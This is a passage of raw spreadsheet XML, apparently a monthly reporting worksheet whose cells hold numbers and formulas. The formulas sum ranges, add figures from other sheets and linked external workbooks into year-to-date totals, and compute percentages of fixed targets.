      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'23'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'23'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]24'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]24'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]24'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]24'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]24'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]24'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]24'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]24'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]24'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'23'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'23'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]24'!$W$69</f>
        <v>0</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]24'!$X$69</f>
        <v>22.5925764408544</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]24'!$Y$69</f>
        <v>25.1966540548776</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]24'!$T$69</f>
        <v>0</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]24'!$U$69</f>
        <v>66.2586805555555</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]24'!$V$69</f>
        <v>68.2324255121043</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]24'!$Q$69</f>
        <v>0.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]24'!$R$69</f>
        <v>381.65</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]24'!$S$69</f>
        <v>5862.53</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'23'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'23'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]24'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]24'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]24'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]24'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]24'!$U$104</f>
        <v>40.0984375</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]24'!$V$104</f>
        <v>62.7446112662942</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]24'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]24'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]24'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'23'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'23'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]24'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]24'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]24'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]24'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]24'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]24'!$V$105</f>
        <v>32.6371275605214</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]24'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]24'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]24'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'23'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'23'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]24'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]24'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]24'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]24'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]24'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]24'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]24'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]24'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]24'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]24'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]24'!$E$16</f>
        <v>4817</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'23'!H31</f>
        <v>111066</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1484073</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]24'!$I$16</f>
        <v>5357.45</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'23'!K31</f>
        <v>116208.84</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1472256.97</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]24'!$L$16</f>
        <v>60286.53</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>80.38204</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'[11]24'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]24'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'23'!H32</f>
        <v>103074</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1630917</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]24'!$I$13</f>
        <v>3587</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'23'!K32</f>
        <v>81766</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1103244</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]24'!$L$13</f>
        <v>63689.796</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>127.379592</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]24'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]24'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]24'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]24'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]24'!$U$76</f>
        <v>3.99305555555555e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]24'!$V$76</f>
        <v>4.1084729981378e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]24'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]24'!$R$76</f>
        <v>2.3e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]24'!$S$76</f>
        <v>3.53e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]24'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'23'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]24'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'23'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]24'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]24'!$W$77</f>
        <v>20.76</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]24'!$X$77</f>
        <v>18.65</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]24'!$Y$77</f>
        <v>19.76</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]24'!$T$77</f>
        <v>100.000000000042</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]24'!$U$77</f>
        <v>13.9288194444462</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]24'!$V$77</f>
        <v>59.8236731843589</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]24'!$Q$77</f>
        <v>24.00000000001</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]24'!$R$77</f>
        <v>80.23000000001</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]24'!$S$77</f>
        <v>5140.05000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]24'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'23'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]24'!$I$50</f>
        <v>0</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'23'!K34</f>
        <v>18055.71</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>485258.64</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]24'!$L$15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'[11]24'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'23'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]24'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'23'!K35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G36+'23'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'23'!K36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G37+'23'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'23'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]24'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]24'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]24'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'23'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]24'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'23'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]24'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'23'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'23'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]24'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]24'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]24'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'23'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]24'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'23'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]24'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'23'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'23'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]24'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]24'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]24'!$R$50</f>
        <v>367.02</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'23'!U39</f>
        <v>7682.78</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>86496.379</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]24'!$V$50</f>
        <v>311</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'23'!X39</f>
        <v>7690</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>86449</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]24'!$Y$50</f>
        <v>1224.326</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'23'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'23'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]24'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]24'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]24'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]24'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]24'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]24'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]24'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]24'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]24'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]24'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]24'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'23'!H41</f>
        <v>15203</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>140179</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]24'!$I$16</f>
        <v>1032.1</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'23'!K41</f>
        <v>20866.78</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>142260.32</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]24'!$L$16</f>
        <v>20465.98</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>68.2199333333333</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]24'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]24'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]24'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'23'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]24'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'23'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]24'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]24'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]24'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'23'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]24'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'23'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]24'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]24'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]24'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]24'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'23'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]24'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'23'!X42</f>
        <v>13382</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>215853</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]24'!$Y$8</f>
        <v>4724.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]24'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]24'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'23'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]24'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'23'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]24'!$L$14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'[12]24'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'23'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]24'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'23'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]24'!$L$15</f>
        <v>55872.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]24'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]24'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]24'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'23'!U44</f>
        <v>5784.8</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>70537.968</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]24'!$V$29</f>
        <v>202</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'23'!X44</f>
        <v>4301</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>70711</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]24'!$Y$29</f>
        <v>3783.257</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]24'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'23'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]24'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'23'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]24'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]24'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
